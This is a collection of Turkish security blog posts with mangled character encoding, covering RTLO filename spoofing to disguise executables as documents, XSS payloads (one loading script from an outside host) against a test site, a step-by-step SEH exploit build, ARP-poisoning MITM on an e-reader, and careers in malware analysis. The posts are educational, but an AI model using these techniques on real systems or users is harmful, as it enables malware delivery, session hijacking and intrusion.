Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

